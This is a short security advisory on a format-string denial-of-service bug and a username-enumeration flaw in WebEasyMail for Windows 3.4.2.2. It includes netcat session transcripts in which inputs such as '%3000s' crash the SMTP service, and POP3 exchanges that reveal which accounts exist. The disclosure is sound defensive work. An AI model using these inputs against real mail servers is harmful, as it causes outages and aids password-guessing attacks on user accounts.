Reported August 20, 2002, by Stan Bubrouski.
VERSION AFFECTED
· WebEasyMail for Windows 3.4.2.2 and earlier versions
DESCRIPTION
Two vulnerabilities exist in WebEasyMail for Windows 3.4.2.2 and earlier versions that can result in a Denial of Service (DoS) condition and information disclosure. The DoS condition results when an attacker sends input containing specially crafted format strings, such as those processed by the “printf” family of functions, causing the service to terminate without an error message. The information disclosure vulnerability lets an attacker obtain a valid username and password on the vulnerable system. By default, an attacker can make unlimited logon attempts without the server terminating the connection. If the attacker gives a wrong password, the server responds with "-ERR invalid username" if the user doesn't exist and with "-ERR wrong password for this user" if the user exists.
DEMONSTRATION
The discoverer posted the following scenarios as proof-of-concept:
For the DoS condition:
$ nc localhost 25
220 ESMTP on WebEasyMail [3.4.2.2] ready. http://www.winwebmail.com
%2
502 Error: command not implemented
%2s
502 Error: command not implemented
%100s
502 Error: command not implemented
%3000s
[emsrv.exe silently dies here]
$
For the information disclosure vulnerability:
OK POP3 on WebEasyMail [3.4.2.2] ready. http://www.winwebmail.com
user dog
+OK user accepted
pass dog
-ERR invalid username
user test
+OK user accepted
pass dog
-ERR wrong password for this user
VENDOR RESPONSE
The vendor, WebEasyMail, has been notified, but has not yet released a patch for this vulnerability.
CREDIT
Discovered by Stan Bubrouski.
Multiple Vulnerabilities in WebEasyMail for Windows